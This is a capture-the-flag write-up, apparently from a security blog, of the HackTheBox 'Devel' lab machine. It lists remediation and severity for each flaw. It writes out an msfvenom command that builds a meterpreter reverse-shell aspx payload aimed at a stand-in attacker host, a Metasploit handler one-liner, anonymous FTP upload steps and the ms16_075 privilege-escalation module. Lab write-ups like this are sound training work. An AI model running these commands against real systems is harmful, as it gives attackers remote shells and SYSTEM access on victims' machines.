Writeup: Devel CTF

Devel CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Devel CTF from HackTheBox.

Devel CTF icon

Devel CTF

Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Independent Challenge - 10.10.10.5

export IP=10.10.10.5

Service Enumeration

IP AddressPorts Open
10.10.10.5TCP: 21, 80
nmap scan output

Initial Access - Writing files to the web server via a misconfigured FTP server

Vulnerability Explanation: Behind Security noticed that the FTP server mirrors the files of the web server on port 80, and an anonymous user has the ability to upload arbitrary files. By uploading a malicious apsx file that later got executed by the IIS http server on port 80, Behind Security was able to establish a foothold on the system.

Vulnerability Fix:

  1. Disable anonymous access to the FTP server to prevent unauthorized file uploads.
  2. Implement proper access controls and permissions on the web server's file directories, ensuring that only authorized users can modify or upload files.
  3. Regularly update and patch both the FTP server and the IIS web server software to the latest versions to address security vulnerabilities.

Severity: High

Steps to Reproduce the Attack:

  1. Generate a malicious aspx file using msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER-IP LPORT=54321 -f aspx > evil.aspx
  2. Run msfconsole: msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ATTACKER-IP; set LPORT 54321; run"
  3. Log in anonymously to the FTP server on port 21: ftp [email protected]
  4. Upload your malicious aspx file: ftp> put evil.aspx
  5. Make the web server execute the malicious aspx at http://10.10.10.5/evil.aspx
Generating a malicious aspx file
Receiving a meterpreter reverse connection

Post Exploitation

LPE to Root

Vulnerability Explanation: Further enumeration of the system led to the discovery of a critical vulnerability that allows the user IIS APPPOOL\Web to escalate privileges directly to NT AUTHORITY\SYSTEM. The vulnerability's identification is ms16_075, and a public exploit is available.

Vulnerability Fix: Microsoft has released a fix for this known issue. It is recommended to conduct regular updates on the system.

Severity: Extreme

Steps to Reproduce the Attack:

  1. The attacker needs to have a meterpreter session on the victim machine.
  2. Background the session using the command bg
  3. Use the exploit: use exploit/windows/local/ms16_075_reflection_juicy and set the SESSION variable.
  4. Run the exploit on your meterpreter session and abuse your root privileges.
Elevating privileges to NT AUTHORITY\SYSTEM
Proof of Exploitation: REDACTED user.txt
Proof of Exploitation: REDACTED root.txt

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top